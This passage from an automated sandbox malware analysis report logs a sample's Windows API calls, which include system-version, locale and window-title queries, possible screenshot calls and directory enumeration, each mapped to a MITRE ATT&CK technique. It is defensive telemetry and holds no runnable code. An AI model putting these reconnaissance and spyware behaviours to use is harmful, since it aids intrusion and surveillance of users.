00000000-00002312)\n \"WINLOGON.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00002312)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006120)\n \"D3_08.exe\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006120)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338040'}\" (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4338008'}\" (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"LoadResource with parameter {'hModule': '4194304', 'hResInfo': '4337992'}\" (UID: 00000000-00004424)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d7780f61c0000f0fd7f9a5c307700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3077608237772000000000f0fd7f9a5c307700e0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00005912)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d77c0dd1a0000f0fd7f9a5c307700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3077608237772000000000f0fd7f9a5c307700e0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21be201d01be2010016e2010000df01e414e201880000008800000017682f779817e201ff2b2f77b7c72a77a41be201ac011c0000001c000000df01c06ddf011200a200fb040000c06ddf015016e201100000000000000013009d00fb040000c06ddf01 (UID: 00000000-00004200)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d77f8b020000030fd7f9a5c307700f0fd7f60c612004430fd7f00000000400000003f0000001f0000000030fd7f54c61200c15c3077608237771f0000000030fd7f9a5c307700f0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00004200)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21be501d01be5010016e5010000e201e414e501880000008800000017682f779817e501ff2b2f773dc42a77a41be501ac012c0000002c000000e201c06de2011000ac00d0040000c06de2015016e50110000000000000001100a700d0040000c06de201 (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b5900d01b59000016590000005600e4145900880000008800000017682f7798175900ff2b2f7729bc2a77a41b5900ac0160000000600000005600c06d56001200a200e0000000c06d560050165900100000000000000013009d00e0000000c06d5600 (UID: 00000000-00006036)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d7730c463000090fd7f9a5c307700f0fd7f60c612004490fd7f00000000400000003f000000200000000090fd7f54c61200c15c307760823777200000000090fd7f9a5c307700f0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00006068)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b4601d01b46010016460100004301e4144601880000008800000017682f7798174601ff2b2f776fb62a77a41b4601ac0126000000260000004301c06d430114009800e3000000c06d430150164601100000000000000015009300e3000000c06d4301 (UID: 00000000-00002312)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a00100005a1b4101581b41018815410100003e016c144101880000008800000017682f7720174101ff2b2f775eab2a772c1b4101ac012a0000002a0000003e01905b3e011000ac003c040000905b3e01d815410110000000000000001100a7003c040000905b3e01 (UID: 00000000-00006120)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bd601d01bd6010016d6010000d301e414d601880000008800000017682f779817d601ff2b2f771fac2a77a41bd601ac012100000021000000d301c06dd3011200a20084020000c06dd3015016d601100000000000000013009d0084020000c06dd301 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d775825260000f0fd7f9a5c307700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3077608237772000000000f0fd7f9a5c307700e0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bde01d01bde010016de010000db01e414de01880000008800000017682f779817de01ff2b2f7725a02a77a41bde01ac012e0000002e000000db01c06ddb011200a2003c040000c06ddb015016de01100000000000000013009d003c040000c06ddb01 (UID: 00000000-00004424)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bdb01d01bdb010016db010000d801e414db01880000008800000017682f779817db01ff2b2f7715a02a77a41bdb01ac012f0000002f000000d801c06dd8011200a20039040000c06dd8015016db01100000000000000013009d0039040000c06dd801 (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b4101d01b41010016410100003e01e4144101880000008800000017682f7798174101ff2b2f7748992a77a41b4101ac0162000000620000003e01c06d3e01140098001d000000c06d3e01501641011000000000000000150093001d000000c06d3e01 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d77c88d660000c0fd7f9a5c307700f0fd7f60c6120044c0fd7f00000000400000003f0000002000000000c0fd7f54c61200c15c3077608237772000000000c0fd7f9a5c307700f0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b0e02d01b0e0200160e0200000b02e4140e02880000008800000017682f7798170e02ff2b2f77eb922a77a41b0e02ac011a0000001a0000000b02c06d0b0214009800f3000000c06d0b0250160e02100000000000000015009300f3000000c06d0b02 (UID: 00000000-00003524)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a00100005a1bdf01581bdf018815df010000dc016c14df01880000008800000017682f772017df01ff2b2f7757972a772c1bdf01ac012400000024000000dc01905bdc011000ac00fb040000905bdc01d815df0110000000000000001100a700fb040000905bdc01 (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bd201d01bd2010016d2010000cf01e414d201880000008800000017682f779817d201ff2b2f77528f2a77a41bd201ac012000000020000000cf01c06dcf0114009800b1020000c06dcf015016d201100000000000000015009300b1020000c06dcf01 (UID: 00000000-00004420)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b5101d01b51010016510100004e01e4145101880000008800000017682f7798175101ff2b2f77a18c2a77a41b5101ac0128000000280000004e01c06d4e0114009800b1020000c06d4e0150165101100000000000000015009300b1020000c06d4e01 (UID: 00000000-00003476)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb4d7790602c0000f0fd7f9a5c307700e0fd7f60c6120044f0fd7f00000000400000003f0000002000000000f0fd7f54c61200c15c3077608237772000000000f0fd7f9a5c307700e0fd7f78c6120057892f778083377713173975d8eb4d77 (UID: 00000000-00003476)\n \"D3_08.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a00100005a1b4001581b40018815400100003d016c144001880000008800000017682f7720174001ff2b2f77558d2a772c1b4001ac0125000000250000003d01905b3d011000ac003c040000905b3d01d815400110000000000000001100a7003c040000905b3d01 (UID: 00000000-00001748)\n \"CSRSS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bc701d01bc7010016c7010000c401e414c701880000008800000017682f779817c701ff2b2f77da842a77a41bc701ac012d0000002d000000c401c06dc4011200a2003c040000c06dc4015016c701100000000000000013009d003c040000c06dc401 (UID: 00000000-00002684)\n \"LSASS.EXE\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21bde01d01bde010016de010000db01e414de01880000008800000017682f779817de01ff2b2f77227e3577a41bde01ac012000000020000000db01c06ddb0114009800b1020000c06ddb015016de01100000000000000015009300b1020000c06ddb01 (UID: 00000000-00002656)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b6e00d01b6e0000166e0000006b00e4146e00880000008800000017682f7798176e00ff2b2f7741713577a41b6e00ac012c0000002c0000006b00c06d6b001200a200ce040000c06d6b0050166e00100000000000000013009d00ce040000c06d6b00 (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031007750592f7798010000a0010000d21b6d00d01b6d0000166d0000006a00e4146d00880000008800000017682f7798176d00ff2b2f77d8773577a41b6d00ac011c0000001c0000006a00c06d6a001200a2007a030000c06d6a0050166d00100000000000000013009d007a030000c06d6a00 (UID: 00000000-00001856)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-147", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve local language", "description": "\"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004200)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006036)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00002312)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006120)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004424)\n \"IExplorer.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003524)\n \"D3_08.exe\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00004420)\n \"LSASS.EXE\" called \"GetLocaleInfoW\" with parameter \"1033\" - (UID: 00000000-00003476)", "origin": "API Call", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005912)\n \"D3_08.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00004200)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005912)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-151", "type": 6, "relevance": 3, "name": "Calls an API typically used to get active windows title", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"GetWindowTextA\" (UID: 00000000-00005912)\n \"D3_08.exe\" called \"GetWindowTextA\" (UID: 00000000-00005904)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000009009180068da1200b3441d6a81d05b750000000000000000000000000000000000000000000000001401000000000000000000000000000075d91e20f831be2624df12005ecb59751401000000000000005d577580e112000e5d577518dd1200dcaa5b75010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036003fd91e20f8da12006d8243774c7a1c0004010000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000320035003300300034003200630037003800610037003600350063006400610038003200340003000000000000000200000068f61c00404c1a00286d18003200020001000000f40100000a0000000000000000000000484c1a00c201000009000000f071180005000000000000003200000048fe1c00a0c51200cc41307768f61c0028000000fc000000ff2b2f770fe62a77d8eb4d77ac0118000000180031000700010000000000ffff95010000040000000100000032000200010000000300000001000000000000000000000038701800f8070000200000000000000000000000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0001000000ffffffff0200000008000000b8f41c00b8f41c00b3f41c000000000002000000b88f1a0000000000010000080000000068ec120095e12b7787311700feffffffe0d912003f08287602000000b88f1a00000000000100001888fb2776d0d91200c81c5b75a6db120095fb277604db1200b88f1a000000000000000000000000008cda1200000018007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cbd91e204cda12006d8243774c7a1c0004010000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600a3d01e2064d312006d82437724771e0004010000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000b8b11c00b8cf1200b3441d6a81d05b7500000000000000000000000000000000000000000000000078010000000000000000000000000000a5cc1e208824be2674d412005ecb59757801000000000000005d5775d0d612000e5d577568d21200dcaa5b7501000000000000007a000000fffffffffffffffff0cf1200780200000000000025000000f0cf12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600cfd31e2048d012006d824377ec7c1e0004010000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e00003b00000000180000000000007f1e00accf120004642f7738011800e0632f7702000000b88f1a00000000000100000887311700feffffffbcc73777c0c737770a000000600f000000001800d87c1e00f83b0000ff07000000001800000000007f070000c400180008301800612600005ccf120067e52c7700001800d87c1e000000000000001800000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036009bcc1e209ccf12006d824377ec7c1e0004010000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000d0d02100cbd0210000000000000000000000180000000001e4cb12000000000048d9120095e12b7787311700feffffff435c2f7750592f77aa000000b8000000cad02100c8d021006ccd1200a4d11200000000000000000000000000000000000000000000000000201c0000000018001c5c2e7760d83875ffffffff170000001ccd120024000000030000000cd2120038d71200a4d112008600000048cd120096ed2f77f2d02100a06a0575860000006ccd1200a4d112000000000086008800a06a05756ccd1200916c0575f2d02100a06a0575a06a0575dcd1120002020000 (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005912)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005904)\n \"D3_08.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000f8f6180068da1200b3441d6a81d05b750000000000000000000000000000000000000000000000003c0100000000000000000000000000005a2aef203a43ed2224df12005ecb59753c01000000000000005d577580e112000e5d577518dd1200dcaa5b75010000000000000072000000ffffffffffffffffa0da1200780200000000000025000000a0da12007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d004100360042004200320031003600f02aef20f8da12006d82437704761a0004010000 (UID: 00000000-00005904)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"IsWow64Process\" with parameter \"5912\" - (UID: 00000000-00005912)\n \"D3_08.exe\" called \"IsWow64Process\" with parameter \"5904\" - (UID: 00000000-00005904)\n \"IExplorer.exe\" called \"IsWow64Process\" with parameter \"4200\" - (UID: 00000000-00004200)\n \"WINLOGON.EXE\" called \"IsWow64Process\" with parameter \"6068\" - (UID: 00000000-00006068)\n \"CSRSS.EXE\" called \"IsWow64Process\" with parameter \"6024\" - (UID: 00000000-00006024)\n \"SERVICES.EXE\" called \"IsWow64Process\" with parameter \"6040\" - (UID: 00000000-00006040)\n \"LSASS.EXE\" called \"IsWow64Process\" with parameter \"3476\" - (UID: 00000000-00003476)\n \"SMSS.EXE\" called \"IsWow64Process\" with parameter \"3904\" - (UID: 00000000-00003904)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004200)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006100)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006036)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002312)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006120)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006024)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004424)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004416)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00006040)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003524)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004420)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003476)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001748)\n \"CSRSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002684)\n \"LSASS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002656)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004116)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001856)\n \"D3_08.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00001176)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003904)\n \"SERVICES.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003548)\n \"SMSS.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003816)\n \"IExplorer.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004112)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004508)\n \"WINLOGON.EXE\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004172)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"25010962\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"25010962\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"25010962\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"25010962\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"D3_08.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"IExplorer.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"1\"\n \"cy\": \"1\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"32\"\n \"cy\": \"32\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"WINLOGON.EXE\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"41010bee\"\n \"cx\": \"1\"\n \"cy\": \"1\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindFirstFileA\" with parameter C:\\\\msvbvm60.dll (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\*.* (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter addins (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter AppCompat (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter AppPatch (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter assembly (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter bfsvc.exe (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Boot (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter bootstat.dat (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called \"FindNextFileW\" with parameter Branding (UID: 00000000-00005912)\n \"506352ac93ecf5253042c78a765cda824412c739db7cc7f5bf78a47ba77c4c47.exe\" called 